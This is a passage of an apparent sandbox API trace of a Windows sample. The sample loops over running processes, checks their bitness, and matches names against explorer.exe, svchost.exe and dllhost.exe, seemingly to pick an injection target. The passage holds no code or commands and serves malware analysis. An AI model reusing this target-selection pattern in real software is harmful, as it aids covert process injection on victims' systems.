(dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6ac) returned 0x0 [0188.395] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x92c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0188.396] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x92c) returned 0xd8 [0188.396] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0188.396] CloseHandle (hObject=0xd8) returned 1 [0188.396] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x924, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0188.396] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x924) returned 0xd8 [0188.396] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0188.396] CloseHandle (hObject=0xd8) returned 1 [0188.397] lstrcmpiA (lpString1="explorer.exe", lpString2="explorer.exe") returned 0 [0188.397] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x958, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0188.397] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x958) returned 0xd8 [0188.397] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0188.397] CloseHandle (hObject=0xd8) returned 1 [0188.397] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x954, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0188.398] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x5b8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x6ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="gtjtdfe")) returned 1 [0188.398] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x5b8) returned 0xd8 [0188.398] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0188.398] CloseHandle (hObject=0xd8) returned 1 [0188.398] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x5b8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x6ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="gtjtdfe")) returned 0 [0188.399] CloseHandle (hObject=0xd4) returned 1 [0188.399] Sleep (dwMilliseconds=0x3e8) [0189.424] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0xd4 [0189.426] Process32First (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0189.426] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x0) returned 0x0 [0189.426] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x50, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0189.427] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4) returned 0x0 [0189.427] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0189.427] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x104) returned 0x0 [0189.427] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0189.428] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x148) returned 0x0 [0189.428] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x17c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0189.428] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x17c) returned 0x0 [0189.428] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x188, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0189.429] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x188) returned 0x0 [0189.429] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0189.429] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1b0) returned 0x0 [0189.429] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0189.430] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1cc) returned 0x0 [0189.430] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0189.430] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1d4) returned 0x0 [0189.430] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x17c, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0189.431] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1dc) returned 0x0 [0189.431] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0189.431] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x254) returned 0x0 [0189.431] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0189.432] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x298) returned 0x0 [0189.432] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x2cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0189.432] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2cc) returned 0x0 [0189.432] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x334, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0189.433] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x334) returned 0x0 [0189.433] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x36c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1f, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0189.433] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x36c) returned 0x0 [0189.433] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x2cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0189.434] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3a8) returned 0x0 [0189.434] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0189.434] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3f8) returned 0x0 [0189.434] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x124, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0189.435] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x124) returned 0x0 [0189.435] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x448, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x334, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0189.435] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x448) returned 0xd8 [0189.435] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0189.435] CloseHandle (hObject=0xd8) returned 1 [0189.435] lstrcmpiA (lpString1="dwm.exe", lpString2="explorer.exe") returned -1 [0189.435] lstrcmpiA (lpString1="dwm.exe", lpString2="svchost.exe") returned -1 [0189.435] lstrcmpiA (lpString1="dwm.exe", lpString2="dllhost.exe") returned 1 [0189.435] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0189.436] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x480) returned 0x0 [0189.436] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0189.436] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4ac) returned 0xd8 [0189.437] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0189.437] CloseHandle (hObject=0xd8) returned 1 [0189.437] lstrcmpiA (lpString1="taskhost.exe", lpString2="explorer.exe") returned 1 [0189.437] lstrcmpiA (lpString1="taskhost.exe", lpString2="svchost.exe") returned 1 [0189.437] lstrcmpiA (lpString1="taskhost.exe", lpString2="dllhost.exe") returned 1 [0189.437] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0189.437] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4d4) returned 0x0 [0189.437] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0189.438] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x50c) returned 0x0 [0189.438] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="abortion-serbia-effect.exe")) returned 1 [0189.438] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc4) returned 0xd8 [0189.438] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0189.438] CloseHandle (hObject=0xd8) returned 1 [0189.438] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x62c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="beverages-tapes-dod.exe")) returned 1 [0189.439] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x62c) returned 0xd8 [0189.439] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0189.439] CloseHandle (hObject=0xd8) returned 1 [0189.439] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x5a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="receptor paintings.exe")) returned 1 [0189.439] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x5a4) returned 0xd8 [0189.439] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0189.439] CloseHandle (hObject=0xd8) returned 1 [0189.439] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x780, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="definitely.exe")) returned 1 [0189.440] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x780) returned 0xd8 [0189.440] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0189.440] CloseHandle (hObject=0xd8) returned 1 [0189.440] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x240, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="knewdifferenceskaren.exe")) returned 1 [0189.441] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x240) returned 0xd8 [0189.441] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0189.441] CloseHandle (hObject=0xd8) returned 1 [0189.441] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x2c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="whenever.exe")) returned 1 [0189.441] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2c8) returned 0xd8 [0189.442] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0189.442] CloseHandle (hObject=0xd8) returned 1 [0189.442] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x310, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="potentially.exe")) returned 1 [0189.442] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x310) returned 0xd8 [0189.442] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0189.442] CloseHandle (hObject=0xd8) returned 1 [0189.442] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x314, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="seeker.exe")) returned 1 [0189.443] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x314) returned 0xd8 [0189.443] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0189.443] CloseHandle (hObject=0xd8) returned 1 [0189.443] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x320, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="objects-virus-israeli.exe")) returned 1 [0189.443] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x320) returned 0xd8 [0189.443] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0189.443] CloseHandle (hObject=0xd8) returned 1 [0189.443] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="birth bean.exe")) returned 1 [0189.444] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7a4) returned 0xd8 [0189.444] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0189.444] CloseHandle (hObject=0xd8) returned 1 [0189.444] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x688, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="ruby.exe")) returned 1 [0189.444] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x688) returned 0xd8 [0189.444] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0189.444] CloseHandle (hObject=0xd8) returned 1 [0189.445] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="zoodiffer.exe")) returned 1 [0189.445] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7f0) returned 0xd8 [0189.445] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0189.445] CloseHandle (hObject=0xd8) returned 1 [0189.445] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="smith.exe")) returned 1 [0189.446] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7d4) returned 0xd8 [0189.446] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0189.446] CloseHandle (hObject=0xd8) returned 1 [0189.446] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x58c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="spicedespite.exe")) returned 1 [0189.446] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x58c) returned 0xd8 [0189.446] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0189.446] CloseHandle (hObject=0xd8) returned 1 [0189.446] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x644, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="wooden.exe")) returned 1 [0189.447] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x644) returned 0xd8 [0189.447] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0189.447] CloseHandle (hObject=0xd8) returned 1 [0189.447] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="dallasr.exe")) returned 1 [0189.447] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7e0) returned 0xd8 [0189.447] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0189.447] CloseHandle (hObject=0xd8) returned 1 [0189.447] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x5d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="bags shakira tourism.exe")) returned 1 [0189.448] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x5d8) returned 0xd8 [0189.448] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0189.448] CloseHandle (hObject=0xd8) returned 1 [0189.448] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="constadvertisement.exe")) returned 1 [0189.449] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7d8) returned 0xd8 [0189.449] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0189.449] CloseHandle (hObject=0xd8) returned 1 [0189.449] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x2ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="sensors-democrat.exe")) returned 1 [0189.449] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2ac) returned 0xd8 [0189.449] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0189.449] CloseHandle (hObject=0xd8) returned 1 [0189.449] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="doctrine alcohol.exe")) returned 1 [0189.450] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7fc) returned 0xd8 [0189.450] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0189.450] CloseHandle (hObject=0xd8) returned 1 [0189.450] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x53c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="population openings.exe")) returned 1 [0189.450] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x53c) returned 0xd8 [0189.450] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0189.450] CloseHandle (hObject=0xd8) returned 1 [0189.450] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x6b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0189.451] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6b4) returned 0x0 [0189.451] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa38, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0189.451] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa38) returned 0x0 [0189.451] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa58, 